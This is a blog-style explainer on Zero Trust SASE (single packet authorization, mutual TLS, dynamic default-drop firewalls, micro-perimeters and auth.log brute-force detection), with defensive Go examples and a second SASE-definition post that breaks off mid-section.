Network address translation is mapping an IP address space into another by modifying network address information in the IP header of packets while they are in transit across a traffic routing device. Limiting visibility this way works to a degree, but we cannot ignore the fact that a) if you have someone’s IP address, you can reach them, and b) if a port is open, you can potentially connect to it.

Therefore, the traditional security method can leave your network wide open to compromise, especially since bad actors have all the tools they need; finding, downloading, and running a port scanning tool is not hard.

“Nmap,” short for Network Mapper, is the most widely used port scanner. It discovers hosts on a network, probes their ports and services with crafted packets, and interprets the responses (or their absence) to build a map of what is listening and, often, which software and operating system sits behind it. A port-knocked or SPA-protected service does not show up in that map because, until the client has authorized itself, its port looks like any other filtered port.

Example: Understanding Lynis

Lynis is an open-source security auditing and hardening tool for Unix, Linux, and macOS systems. It analyses the system’s configuration in depth and reports potential weaknesses. By checking the system against a large catalogue of known hardening controls and misconfigurations, Lynis points out where a host falls short, and each finding comes with a suggestion for fixing it.

Lynis runs a series of tests and audits on the target system. It examines various aspects, including file permissions, system settings, available software packages, and network configurations. Lynis generates a detailed report highlighting any identified vulnerabilities or potential security gaps by analyzing these factors. This report becomes a valuable resource for system administrators and security professionals to take necessary actions and mitigate risks.

Example: Single Packet Authorization

Zero-trust network security hides infrastructure behind lightweight protocols such as single packet authorization (SPA). No internal IP addresses or DNS names are exposed, which makes the network invisible to anyone who has not authenticated. An unauthenticated client gets neither visibility nor connectivity; a connection is established only after the client has proven it can be trusted, and then only for the legitimate traffic it asked for. The protected assets can sit anywhere: on-premises, in a public or private cloud, in a DMZ, or on the internal LAN, which fits today’s hybrid environment.

Default-drop dynamic firewall

This approach also reduces exposure to denial-of-service attacks. Anything internet-facing is reachable from the public Internet and is therefore a target for both bandwidth and server-resource exhaustion. A default-drop firewall has no visible presence to unauthorized users, and only packets that carry a valid authorization are acted on, so the service behind it cannot be exhausted by unauthenticated connections (a volumetric flood can still saturate the link in front of it). Single packet authorization (SPA) also provides attack detection.

If a host receives anything other than a valid SPA packet or similar construct, it views that packet as part of a threat. The first packet to a service must be a valid SPA packet or similar security construct.

Any other packet type is treated as an attack, which makes SPA a useful bad-packet detector: a single unsolicited packet is enough to flag a probe, with no need to wait for a pattern to emerge. Unsolicited traffic from the outside and from other internal domains is surfaced in the same way.

B. Zero Trust SASE architecture requirements: Mutually encrypted connections:

Transport Layer Security (TLS) is the protocol that protects data in transit between two computers: the two sides negotiate keys and cipher suites they both support and then encrypt everything they exchange. TLS can authenticate both endpoints with certificates before any confidential data crosses the public Internet. The standard configuration, however, only checks that the client is talking to the server it intended: the server presents a certificate, and the client presents none. Typical TLS deployments therefore authenticate servers to clients, not clients to servers.

Mutually encrypted connections

SASE uses TLS’s optional client authentication to get mutual, two-way cryptographic authentication. Mutual TLS (mTLS) keeps everything standard TLS does and additionally authenticates the client: both parties present X.509 certificates and verify each other’s before the encrypted session is used. Mutual TLS connections are set up between all components in the SASE architecture.

mTLS helps contain the risk of moving services to the cloud. A connection is refused at the handshake unless the device presents a certificate issued by the organisation’s own CA, so unauthorized users and devices never reach the application, and an attacker cannot impersonate a genuine app or client with a certificate from some other authority, because only the private CA is trusted. This holds as long as that CA and the keys it has issued stay uncompromised: a certificate is a credential and has to be protected like one.
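What that looks like in practice, as an added example rather than code from the post or from any SASE vendor: a Go program that builds a private CA, a gateway certificate and a device certificate in memory, configures the gateway for mutual TLS, and runs the same chain check a Go TLS server performs under RequireAndVerifyClientCert. The CA, gateway and device names are assumptions. The last two calls show the two failure modes the text describes: a certificate for the right device name issued by some other authority, and no certificate at all.

```go
// Mutual TLS as the SASE components would use it: the gateway presents its own
// certificate and refuses any client that cannot present one chaining to the
// organisation's private CA. (Added example; the CA, device and gateway names
// are assumptions, and the certificates are generated in memory on each run.)
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"time"
)

var serial int64

// issue mints a certificate for name: a self-signed CA when parent is nil,
// otherwise an end-entity certificate signed by parent.
func issue(name string, parent *x509.Certificate, parentKey *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	serial++
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(serial),
		Subject:      pkix.Name{CommonName: name},
		NotBefore:    time.Now().Add(-time.Minute),
		NotAfter:     time.Now().Add(24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth, x509.ExtKeyUsageServerAuth},
	}
	signer, signerKey := tmpl, key
	if parent == nil {
		tmpl.IsCA, tmpl.BasicConstraintsValid = true, true
		tmpl.KeyUsage |= x509.KeyUsageCertSign
	} else {
		signer, signerKey = parent, parentKey
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, signer, &key.PublicKey, signerKey)
	if err != nil {
		panic(err)
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return cert, key
}

// ServerConfig is the gateway side of mTLS. The two settings that turn one-way
// TLS into mutual TLS are ClientAuth (default NoClientCert) and ClientCAs.
func ServerConfig(cert *x509.Certificate, key *ecdsa.PrivateKey, ca *x509.Certificate) *tls.Config {
	pool := x509.NewCertPool()
	pool.AddCert(ca)
	return &tls.Config{
		Certificates: []tls.Certificate{{Certificate: [][]byte{cert.Raw}, PrivateKey: key}},
		ClientAuth:   tls.RequireAndVerifyClientCert, // handshake fails without a valid client cert
		ClientCAs:    pool,                           // only the private CA may vouch for devices
		MinVersion:   tls.VersionTLS13,
	}
}

// RequiresClientCert reports whether cfg enforces mutual authentication.
func RequiresClientCert(cfg *tls.Config) bool { return cfg.ClientAuth == tls.RequireAndVerifyClientCert }

// VerifyClient reproduces the check the TLS server applies to the client's
// chain under RequireAndVerifyClientCert, so it can be exercised without a
// socket: the chain must end at a CA in ClientCAs and the leaf must be valid
// for client authentication.
func VerifyClient(cfg *tls.Config, chain ...*x509.Certificate) error {
	if !RequiresClientCert(cfg) {
		return errors.New("server config does not require a client certificate")
	}
	if len(chain) == 0 {
		return errors.New("tls: client didn't provide a certificate")
	}
	inter := x509.NewCertPool()
	for _, c := range chain[1:] {
		inter.AddCert(c)
	}
	_, err := chain[0].Verify(x509.VerifyOptions{
		Roots: cfg.ClientCAs, Intermediates: inter,
		KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
	})
	return err
}

func main() {
	ca, caKey := issue("sase-private-ca", nil, nil)
	gw, gwKey := issue("gateway.example", ca, caKey)
	cfg := ServerConfig(gw, gwKey, ca)
	device, _ := issue("laptop-4711", ca, caKey)
	otherCA, otherKey := issue("some-public-ca", nil, nil)
	forged, _ := issue("laptop-4711", otherCA, otherKey) // right name, wrong issuer
	fmt.Println("enrolled device:", VerifyClient(cfg, device)) // <nil>
	fmt.Println("forged device:  ", VerifyClient(cfg, forged)) // signed by unknown authority
	fmt.Println("no certificate: ", VerifyClient(cfg))         // client didn't provide a certificate
}
```

The forged certificate fails not because its signature is bad (its issuer signed it correctly) but because that issuer is not in ClientCAs; a gateway that loaded the system's public root store there instead would accept it.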

C. Need to know the access model: Zero Trust SASE architecture requirements

Thirdly, SASE employs a need-to-know access model. As a result, SASE permits the requesting client to view only the resources appropriate to the assigned policy. Users are associated with their devices, which are validated based on policy. Only connections to the specifically requested service are enabled, and no other connection is allowed to any other service. SASE provides additional information, such as who made the connection, from what device, and to what service.

This gives complete visibility into every established connection, which is hard to achieve with a purely IP-based solution, and it gives each connection the context needed to judge its risk level. Forensics becomes easier as a result: the SASE architecture only accepts authorized packets, so everything it rejected can be analysed and tracked separately.

Key Point: Device validation

Secondly, it enforces device validation, which helps against threats from unauthorized devices. We can examine the requesting user and perform device validation. Device validation ensures that the machine runs on trusted hardware and is used by the appropriate user.

Finally, suppose a device becomes compromised. In that case, lateral movements are entirely locked down, as a user is only allowed access to the resource it is authorized to. Or they could be placed into a sandbox zone where human approval must intervene and assess the situation.

D. Dynamic access control: Zero Trust SASE architecture requirements

A traditional firewall reasons about the 5-tuple (source and destination address, ports, and protocol) and cannot express or enforce rules about who, or which device, is connecting, which a zero trust identity can. Rather than force identity-centric control into the limits of the 5-tuple, SASE sits alongside the traditional firewall and takes over the network access control enforcement we used to approximate there. Its dynamic firewall starts with one rule: deny all.

Requested communication is then inserted into the rule set on demand, giving an active security policy rather than a static configuration. Every first packet that hits the firewall is checked as a single packet authorization (SPA) packet, and only a verified one is turned into a rule for the requested connection.

Key Point: Dynamic firewall

Once the connection is established, the firewall closes again: it is opened dynamically, for that client and that service, and only for a limited period. The connections made are invisible to rogues outside the network and to users in other domains within it. The result is dynamic, membership-based enclaves that shut out network-based attacks.

SASE dynamically binds users to devices and lets those users reach protected resources by creating and removing inbound and outbound firewall rules as sessions start and end. Access control therefore becomes far more precise, and the standing rule set shrinks considerably.
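The pieces described in the single packet authorization and dynamic-firewall sections, put together as an added example (not from the post): a Go gateway whose only standing rule is deny-all. Assumptions: a pre-shared HMAC key per client, a simplified SPA payload carrying source, port, timestamp and nonce (fwknop additionally encrypts its payload), a 30-second clock-skew allowance and a one-minute rule lifetime. Every packet that is neither a valid SPA packet nor covered by a live rule lands in the alert list, which is the single-packet attack detection the text refers to.

```go
// Single packet authorization in front of a default-drop firewall: the only
// standing rule is "deny all"; a verified SPA packet inserts a time-limited
// accept rule, and every other unsolicited packet is logged as hostile.
// (Added example. Assumptions: a pre-shared HMAC key per client and a
// simplified SPA payload; real implementations such as fwknop also encrypt it.)
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"time"
)

// SPA is the one packet a client sends before anything else.
type SPA struct {
	Src     string // claimed source address, bound into the MAC
	DstPort int    // service the client wants opened
	TS      int64  // unix seconds; limits how long a captured packet stays valid
	Nonce   string // 16 random bytes, hex; defeats replay within the time window
	MAC     string // hex HMAC-SHA256 over the fields above
}

func spaMAC(key []byte, src string, port int, ts int64, nonce string) string {
	m := hmac.New(sha256.New, key)
	fmt.Fprintf(m, "%s|%d|%d|%s", src, port, ts, nonce)
	return hex.EncodeToString(m.Sum(nil))
}

// NewSPA is the client side: authorise src for dstPort with a fresh nonce.
func NewSPA(key []byte, src string, dstPort int, now time.Time) (SPA, error) {
	n := make([]byte, 16)
	if _, err := rand.Read(n); err != nil {
		return SPA{}, err
	}
	p := SPA{Src: src, DstPort: dstPort, TS: now.Unix(), Nonce: hex.EncodeToString(n)}
	p.MAC = spaMAC(key, src, dstPort, p.TS, p.Nonce)
	return p, nil
}

// Gateway is the default-drop firewall with its dynamically inserted rules.
type Gateway struct {
	key    []byte
	skew   time.Duration        // tolerated clock difference for TS
	ttl    time.Duration        // lifetime of an opened rule
	rules  map[string]time.Time // "src->port" -> expiry
	seen   map[string]bool      // nonces already consumed
	Alerts []string             // anything that was neither a valid SPA nor an authorised packet
}

func NewGateway(key []byte, skew, ttl time.Duration) *Gateway {
	return &Gateway{key: key, skew: skew, ttl: ttl, rules: map[string]time.Time{}, seen: map[string]bool{}}
}

// Authorise verifies an SPA packet received from address `from` and, if it is
// genuine, fresh and unseen, opens src->DstPort until now+ttl.
func (g *Gateway) Authorise(p SPA, from string, now time.Time) bool {
	want := spaMAC(g.key, p.Src, p.DstPort, p.TS, p.Nonce)
	age := now.Sub(time.Unix(p.TS, 0))
	switch {
	case p.Src != from || !hmac.Equal([]byte(want), []byte(p.MAC)):
		g.Alerts = append(g.Alerts, "invalid SPA from "+from)
	case age > g.skew || age < -g.skew:
		g.Alerts = append(g.Alerts, "stale SPA from "+from)
	case g.seen[p.Nonce]:
		g.Alerts = append(g.Alerts, "replayed SPA from "+from)
	default:
		g.seen[p.Nonce] = true
		g.rules[fmt.Sprintf("%s->%d", p.Src, p.DstPort)] = now.Add(g.ttl)
		return true
	}
	return false
}

// Permit decides an ordinary packet: only a live rule lets a new connection
// through, and an expired rule is removed on the spot. (Connections already
// established before expiry would be kept by the stateful firewall.)
func (g *Gateway) Permit(src string, port int, now time.Time) bool {
	k := fmt.Sprintf("%s->%d", src, port)
	if exp, ok := g.rules[k]; ok && now.Before(exp) {
		return true
	}
	delete(g.rules, k)
	g.Alerts = append(g.Alerts, fmt.Sprintf("unauthorised packet %s:%d", src, port))
	return false
}

func main() {
	key := []byte("per-client-pre-shared-key")
	g := NewGateway(key, 30*time.Second, time.Minute)
	now := time.Date(2024, 1, 1, 12, 0, 0, 0, time.UTC)
	pkt, _ := NewSPA(key, "203.0.113.5", 22, now)
	fmt.Println("SSH before SPA:", g.Permit("203.0.113.5", 22, now))                     // false
	fmt.Println("SPA accepted:", g.Authorise(pkt, "203.0.113.5", now))                   // true
	fmt.Println("SSH within TTL:", g.Permit("203.0.113.5", 22, now.Add(10*time.Second))) // true
	fmt.Println("SSH after TTL:", g.Permit("203.0.113.5", 22, now.Add(2*time.Minute)))   // false
	fmt.Println("replayed SPA:", g.Authorise(pkt, "203.0.113.5", now.Add(time.Second)))  // false
	fmt.Println("alerts:", g.Alerts)
}
```

Binding the source address into the MAC stops one client's packet from opening a port for another address, the timestamp bounds how long a sniffed packet is worth anything, and the nonce cache closes the remaining replay window; all three are needed, which is why a bare port-knock sequence is not enough.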

**Micro perimeter**

Traditional applications were grouped into VLANs whether or not they offered similar services, and everything on a VLAN could reach everything else on it. The VLAN was a performance construct, invented to break up broadcast domains; it was pushed into the security world and was never designed for it.

Nevertheless, it became the basis of what we know as traditional zone-based networking. The segments in zone-based networks are too large and routinely mix devices with very different security levels and requirements.

Key Points:

A. Logical-access boundary: SASE enables this by creating a logical access boundary encompassing a user and an application or set of applications. And that is it—nothing more and nothing less. Therefore, we have many virtual micro perimeters specific to the business instead of the traditional main inside/outside perimeter. Virtual perimeters allow you to grant access to the particular application, not the underlying network or subnet.

B. Reduce the attack surface: The smaller micro perimeters reduce the attack surface and remove the need for broad access to all ports and protocols or all applications. Each individualized “virtual perimeter” encompasses only the user, the device, and the application. It is created for the session and closed again when the session ends, or when the risk level changes and the device or user is asked for step-up authentication.

C. Software-defined perimeter (SDP): SASE only grants access to the specific application at an application layer. The SDP part of SASE now controls which devices and applications can access distinctive services at an application level. Permitted by a policy granted by the SDP part of SASE, machines can only access particular hosts and services and cannot access network segments and subnets.

**Reduced: Broad Network Access**

Broad network access is eliminated, reducing the attack surface to an absolute minimum. SDP provides a fully encrypted application communication path, and because the application is bound to its tunnel, only authorized applications can send through the established encrypted tunnels; every other application on the device is blocked from using them. This creates a dynamic perimeter around the application and its connected users and devices, and it offers a narrow access path.

E. Identity-driven access control: Zero Trust SASE architecture requirements

Traditional network solutions provide coarse-grained network segmentation based on someone’s IP address. However, someone’s IP address is not a good security hook and does not provide much information about user identity. SASE enables the creation of microsegmentation based on user-defined controls, allowing a 1-to-1 mapping, unlike with a VLAN, where there is the potential to see everything within that VLAN.

Identity-aware access: SASE provides adaptive, identity-aware, precise access for those who need finer access and session control over applications on-premises and in the cloud. Access policies are based primarily on user, device, and application identities. Policy is applied regardless of the user’s physical location or the device’s IP address, except where the policy itself restricts by location. This brings far more context to policy decisions, so that if a bad actor gains access to one segment, they are prevented from reaching any other network resource.

Detecting Authentication Failures in Logs:

Syslog: Useful Security Technology

Syslog, short for System Logging Protocol, is the standard message-logging facility on Unix-like systems (the protocol itself is specified in RFC 5424). It collects log entries from the kernel, services and applications, and can forward them to a central collector. Because it records system activity, errors, and warnings, it is a primary source for detecting security events.

auth.log is the file, on Debian-derived distributions (Red Hat-based systems use /var/log/secure), to which syslog writes authentication-related events: user logins, failed login attempts, sudo use, password changes, and similar activity. Analyzing it reveals brute-force attacks, credential stuffing, and suspicious login patterns.

Now that we understand the importance of syslog and auth.log, let’s delve into some effective techniques for detecting security events in these files. One widely used approach is log monitoring, where automated tools analyze log entries in real time, flagging suspicious or malicious activities. Another technique is log correlation, which involves correlating events across multiple log sources to identify complex attack patterns.
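Both techniques on a few constructed auth.log lines, as an added example not taken from the post: a Go detector that parses sshd events with a regular expression, counts failures per source inside a sliding window, and escalates when a flagged source subsequently succeeds (the correlation that turns a noisy brute-force alert into an incident). The log lines, the threshold of five failures in two minutes and the addresses are invented for the example; a real deployment would read the file or a syslog stream instead of the embedded string.

```go
// Detecting authentication failures in auth.log: parse sshd lines, count
// failures per source in a sliding window, and escalate if that source then
// logs in. (Added example; the log lines, hosts and addresses are constructed.)
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
	"time"
)

// Constructed sample in the classic auth.log/syslog format (not real logs).
const sampleAuthLog = `Jan  1 12:00:01 bastion sshd[4242]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2
Jan  1 12:00:03 bastion sshd[4243]: Failed password for invalid user oracle from 203.0.113.7 port 51235 ssh2
Jan  1 12:00:04 bastion sshd[4244]: Failed password for root from 203.0.113.7 port 51236 ssh2
Jan  1 12:00:06 bastion sshd[4245]: Failed password for root from 203.0.113.7 port 51237 ssh2
Jan  1 12:00:07 bastion sshd[4246]: Failed password for root from 203.0.113.7 port 51238 ssh2
Jan  1 12:00:09 bastion sshd[4247]: Accepted password for root from 203.0.113.7 port 51239 ssh2
Jan  1 12:01:00 bastion sshd[4250]: Accepted publickey for alice from 10.0.0.5 port 2222 ssh2
Jan  1 12:05:00 bastion sshd[4251]: Failed password for bob from 10.0.0.6 port 2223 ssh2
Jan  1 12:05:30 bastion sshd[4252]: Accepted password for bob from 10.0.0.6 port 2224 ssh2`

// sshdLine matches both outcomes, with or without the "invalid user" marker.
var sshdLine = regexp.MustCompile(`^(\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Failed|Accepted) (\S+) for (?:invalid user )?(\S+) from (\S+) port \d+`)

type Event struct {
	At      time.Time
	Outcome string // "Failed" or "Accepted"
	Method  string // password, publickey, ...
	User    string
	Src     string
}

// ParseAuthLog extracts sshd authentication events and ignores everything else.
func ParseAuthLog(text string) []Event {
	var evs []Event
	for _, line := range strings.Split(text, "\n") {
		m := sshdLine.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		at, err := time.Parse("Jan _2 15:04:05", m[1]) // syslog carries no year; ordering within a day is enough here
		if err != nil {
			continue
		}
		evs = append(evs, Event{At: at, Outcome: m[2], Method: m[3], User: m[4], Src: m[5]})
	}
	return evs
}

// Detect raises one alert per source that fails `threshold` times inside
// `window`, and a higher-severity alert if that source then logs in: a brute
// force that finished is the case that matters most.
func Detect(evs []Event, threshold int, window time.Duration) []string {
	sort.Slice(evs, func(i, j int) bool { return evs[i].At.Before(evs[j].At) })
	failures := map[string][]time.Time{}
	flagged := map[string]bool{}
	var alerts []string
	for _, e := range evs {
		if e.Outcome == "Failed" {
			f := failures[e.Src]
			for len(f) > 0 && e.At.Sub(f[0]) > window { // slide the window forward
				f = f[1:]
			}
			f = append(f, e.At)
			failures[e.Src] = f
			if len(f) >= threshold && !flagged[e.Src] {
				flagged[e.Src] = true
				alerts = append(alerts, fmt.Sprintf("brute force: %d failures from %s within %s", len(f), e.Src, window))
			}
		} else if flagged[e.Src] {
			alerts = append(alerts, fmt.Sprintf("CRITICAL: %s logged in as %s by %s after brute force", e.Src, e.User, e.Method))
		}
	}
	return alerts
}

func main() {
	for _, a := range Detect(ParseAuthLog(sampleAuthLog), 5, 2*time.Minute) {
		fmt.Println(a)
	}
}
```

On the sample this produces two alerts for 203.0.113.7 and nothing for bob's single typo, which is the point of the threshold; tune threshold and window to the host's normal failure rate, and feed the same events to the correlation step regardless of whether the failures came from one process or many.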

Summary: Zero Trust SASE

Traditional security measures are no longer sufficient in today’s rapidly evolving digital landscape, where remote work and cloud-based applications have become the norm. Enter Zero Trust Secure Access Service Edge (SASE), a revolutionary approach that combines network security and wide-area networking into a unified framework. In this blog post, we explored the concept of Zero Trust SASE and its implications for the future of cybersecurity.

Understanding Zero Trust

Zero Trust is a security framework that operates under the principle of “never trust, always verify.” It assumes no user or device should be trusted implicitly, regardless of location or network. Instead, identity, access rights, and security posture are verified continuously before any level of access is granted.

The Evolution of SASE

Secure Access Service Edge (SASE) represents a convergence of network security and wide-area networking capabilities. It combines security services, such as secure web gateways, firewall-as-a-service, and data loss prevention, with networking functionalities like software-defined wide-area networking (SD-WAN) and cloud-native architecture. SASE aims to provide comprehensive security and networking services in a unified, cloud-delivered model.

The Benefits of Zero Trust SASE:

a) Enhanced Security: Zero Trust SASE brings a holistic approach to security, ensuring that every user and device is continuously authenticated and authorized. This reduces the risk of unauthorized access and mitigates potential threats.

b) Improved Performance: By leveraging cloud-native architecture and SD-WAN capabilities, Zero Trust SASE optimizes network traffic, reduces latency, and enhances overall performance.

c) Simplified Management: A unified security and networking framework can streamline organizations’ management processes, reduce complexity, and achieve better visibility and control over their entire network infrastructure.

Implementing Zero Trust SASE

a) Comprehensive Assessment: Before adopting Zero Trust SASE, organizations should conduct a thorough assessment of their existing security and networking infrastructure, identify vulnerabilities, and define their security requirements.

b) Architecture Design: Organizations must design a robust architecture that aligns with their needs and integrates Zero Trust principles into their existing systems. This may involve deploying virtualized security functions, adopting SD-WAN technologies, and leveraging cloud services.

c) Continuous Monitoring and Adaptation: Zero Trust SASE is an ongoing process that requires continuous monitoring, analysis, and adaptation to address emerging threats and evolving business needs. Regular security audits and updates are crucial to maintaining a solid security posture.

Conclusion: Zero Trust SASE represents a paradigm shift in cybersecurity, providing a comprehensive and unified approach to secure access and network management. By embracing the principles of Zero Trust and leveraging the capabilities of SASE, organizations can enhance their security, improve performance, and simplify their network infrastructure. As the digital landscape continues to evolve, adopting Zero Trust SASE is not just an option—it’s necessary to safeguard our interconnected world’s future.


SASE Definition


In today's ever-evolving digital landscape, businesses are seeking agile and secure networking solutions. Enter SASE (Secure Access Service Edge), a revolutionary concept that combines network and security functionalities into a unified cloud-based architecture. In this blog post, we will delve into the definition of SASE, its components, implementation benefits, and its potential impact on the future of networking.

At its core, SASE represents a shift from traditional networking models towards a more integrated approach. It brings together wide area networking (WAN), network security services, and cloud-native architecture, resulting in a unified and simplified networking framework. SASE aims to provide organizations with secure access to applications and data from any location, while reducing complexity and improving performance.

SASE is built on several fundamental components that work together harmoniously. These include software-defined wide area networking (SD-WAN), secure web gateways (SWG), cloud access security brokers (CASB), zero-trust network access (ZTNA), and firewall as a service (FWaaS). Each component plays a crucial role in delivering a comprehensive and secure networking experience.

Implementing SASE offers numerous advantages for businesses. Firstly, it simplifies network management by consolidating various services into a single platform. This leads to increased operational efficiency and cost savings. Additionally, SASE enhances security by applying consistent policies across all network traffic, regardless of the user's location. It also improves application performance through intelligent traffic routing and optimization.

As digital transformation continues to shape the business landscape, SASE emerges as a transformative force. Its cloud-native architecture aligns perfectly with the growing adoption of cloud services, enabling seamless integration and scalability. Moreover, SASE accommodates the rise of remote work and the need for secure access from anywhere. As organizations embrace hybrid and multi-cloud environments, SASE is poised to become the backbone of modern networking infrastructure.

SASE represents a paradigm shift in networking, blending security and networking functionalities into a unified framework. By embracing SASE, organizations can streamline operations, enhance security posture, and adapt to the evolving digital landscape. As we move forward, it is essential for businesses to explore the potential of SASE and leverage its benefits to drive innovation and growth.

Highlights: SASE Definition

SASE: A Cloud-Centric Approach

Firstly, SASE is a response to the environment we now operate in. In a cloud-centric world, users and devices need access to services everywhere, and the focal point has shifted to the identity of the user and device, whereas the traditional model centred on the data center and the stack of network security components around it. These environmental changes have created a new landscape we must protect and connect.

Many common problems challenge the new landscape. Enterprises that have deployed appliances for each technology stack are loaded with complexity and overhead, and legacy network and security designs add latency. In addition, nearly all traffic is now encrypted, and it has to be inspected without degrading application performance.

These are reasons to leverage a cloud-delivered secure access service edge (SASE). SASE means a tailored network fabric optimized where it makes the most sense for the user, device, and application – at geographically dispersed PoPs enabling technologies that secure your environment with technologies such as single packet authorization.

**Driving Forces to Adopting SASE**

Challenge 1: Managing the Network: Converging network and security into a single platform does not require multiple integration points. This will eliminate the need to deploy these point solutions and the complexities of managing each.

Challenge 2: Site Connectivity: SASE handles all management complexities. As a result, the administrative overhead for managing and operating a global network that supports site-to-site connectivity and enhanced security, cloud, and mobility is kept to an absolute minimum.

Challenge 3: Performance Between Locations: The SASE cloud already has an optimized converged network and security platforms. Therefore, sites need to connect to the nearest SASE PoP.

Challenge 4: Cloud Agility: SASE natively supports cloud data centers (IaaS) and applications (SaaS) without additional configuration, complexity, or point solutions, enabling built-in cloud connectivity.

**Components of SASE**

1. Network as a Service (NaaS): SASE integrates network services such as SD-WAN (Software-Defined Wide Area Network) and cloud connectivity to provide organizations with a flexible and scalable network infrastructure. With NaaS, businesses can optimize network performance, reduce latency, and ensure reliable connectivity across different environments.

2. Security as a Service (SECaaS): SASE incorporates various security services, including secure web gateways, firewall-as-a-service, data loss prevention, and zero-trust network access. By embedding security into the network infrastructure, SASE enables organizations to enforce consistent security policies, protect against threats, and simplify the management of security measures.

3. Zero-Trust Architecture: SASE adopts a zero-trust approach, which assumes that no user or device should be trusted by default, even within the network perimeter. By implementing continuous authentication, access controls, and micro-segmentation, SASE ensures that every user and device is verified before accessing network resources, reducing the risk of unauthorized access and data breaches.

4. Cloud-Native Architecture: SASE leverages cloud-native technologies to provide a scalable, agile, and elastic network and security infrastructure. By transitioning from legacy hardware appliances to software-defined solutions, SASE enables organizations to respond faster to changing business requirements, reduce costs, and improve overall efficiency.

Note: Point Solutions

SASE is becoming increasingly popular among organizations because it provides a more flexible and cost-effective approach to networking and security. The traditional approach involves deploying multiple devices or appliances, each with its functions. This approach can be complex, time-consuming, and expensive to manage. On the other hand, SASE simplifies this process by integrating all the necessary functions into a single platform.


Example Product: Cisco Meraki

### Simplified Network Management

One of the standout features of the Cisco Meraki platform is its simplified network management. Gone are the days of complex configurations and time-consuming setups. With Meraki’s cloud-based interface, administrators can manage their entire network from a single dashboard. This ease of use not only saves time but also reduces the need for specialized IT staff, making it an ideal solution for businesses of all sizes.

### Robust Security Features

Security is a top priority for any network, and Cisco Meraki does not disappoint. The platform comes equipped with robust security features, including advanced threat protection, intrusion detection, and automated firmware updates. These features work seamlessly to protect your network from potential threats, ensuring that your data remains secure and your operations run smoothly.

### Scalability and Flexibility

As your business grows, so too does the need for a scalable network solution. Cisco Meraki’s platform is designed with scalability in mind, allowing you to easily add new devices and extend your network without any hassle. Whether you’re expanding to a new office location or integrating additional IoT devices, Meraki’s flexible architecture ensures that your network can grow alongside your business.

### Enhanced Visibility and Analytics

Understanding your network’s performance is crucial for making informed decisions. Cisco Meraki offers enhanced visibility and analytics, providing detailed insights into network usage, device performance, and potential issues. With these analytics, administrators can proactively address problems before they impact operations, optimize resource allocation, and ensure that their network is running at peak efficiency.

### Streamlined Troubleshooting

Troubleshooting network issues can be a daunting task, but Cisco Meraki makes it easier than ever. The platform’s intuitive dashboard provides real-time alerts and diagnostic tools, allowing administrators to quickly identify and resolve issues. This streamlined troubleshooting process minimizes downtime and keeps your network running smoothly.

**SASE Meaning: SASE wraps up**

SASE is a network and security architecture that consolidates numerous network and security functions, traditionally delivered as siloed point solutions, into an integrated cloud service. It combines several network and security capabilities with cloud-native security functions, all delivered from the cloud and operated by the SASE vendor.

They are essentially providing a consolidated, platform-based approach to security. We have a cloud-delivered solution consolidating multiple edge network security controls and network services into a unified solution with centralized management and distributed enforcement.

**The appliance-based perimeter**

Even though there has been a shift to the cloud, the traditional perimeter network security solution has remained appliance-based. The case for moving security controls to the cloud rests on better protection and performance, plus easier deployment and maintenance.

The performance problems of the earlier cloud-delivered solutions have been overcome by optimized routing and a global footprint. Opinion is nonetheless split on performance and protection: many still consider them the prime reasons to keep network security solutions on-premises.

Related: For additional pre-information, you may find the following helpful:

  1. SD-WAN SASE
  2. SASE Solution
  3. Security Automation
  4. SASE Model
  5. Cisco Secure Firewall
  6. eBOOK on SASE

SASE Definition

SASE Definition with Challenge 1: Managing the Network

Across the entire networking and security industry, everyone sells individual point solutions that are not a holistic joined-up offering. Thinking only about MPLS replacement leads to incremental point solution acquisitions when confronted by digital initiatives, making networks more complex and costly.

Principally, distributed appliances for network and security at every location require additional tasks such as installation, ongoing management, regular updates, and refreshes. This results in far too many security and network configuration points. We see this all the time with NOC and SOC integration efforts.

A: Numerous integration points:

The point-solution approach addresses one issue and requires considerable integration. Therefore, you must constantly add solutions to the stack, likely resulting in management overhead and increased complexity. Let’s say you are searching for a new car. Would you prefer to build the car with all the different parts or buy the already-built one?

In the same way, the network and security industry as it is geared up today delivers its offering in parts. It is your job to support, manage, and build the stack over time and to scale it when needed, which means you have to be an expert in every part. If the complexity is abstracted into one platform, you no longer need to be. SASE is one effective way to abstract that management and operational complexity.

B: Required: How SASE solves this

Converging network and security into a single platform does not require multiple integration points. This will eliminate the need to deploy these point solutions and the complexities of managing each. Essentially, with SASE, we can bring each point solution’s functionalities together and place them under one hood—the SASE cloud. SASE merges all of the networking and security capabilities into a single platform.

This way, you have a holistic, joined-up offering. Customers don’t need to perform upgrades or size and scale their network; all of this is done for them in the SASE cloud, giving a fully managed and self-healing architecture. If something goes wrong in one of the SASE PoPs, the disruption is minimal: traffic moves to another PoP automatically, with no new tunnels to set up and no administrator stepping in to perform configuration.

SASE Definition with Challenge 2: Site Connectivity

SD-WAN appliances require other solutions for global connectivity and to connect, secure, and manage mobile users and cloud resources. As a result, many users are turning to Service Providers to handle the integration. The carrier-managed SD-WAN providers integrate a mix of SD-WAN and security devices to form SD-WAN services.

A: Lack of Agility

Unfortunately, this often makes the Service Providers inflexible in accommodating new requests. The telco’s lack of agility and high bandwidth costs will remain problematic. Deploying new locations has been the biggest telco-related frustration, especially when connecting offices outside of the telco’s operating region to the company’s MPLS network. For this, they need to integrate with other telcos.

B: Required: How SASE solves this

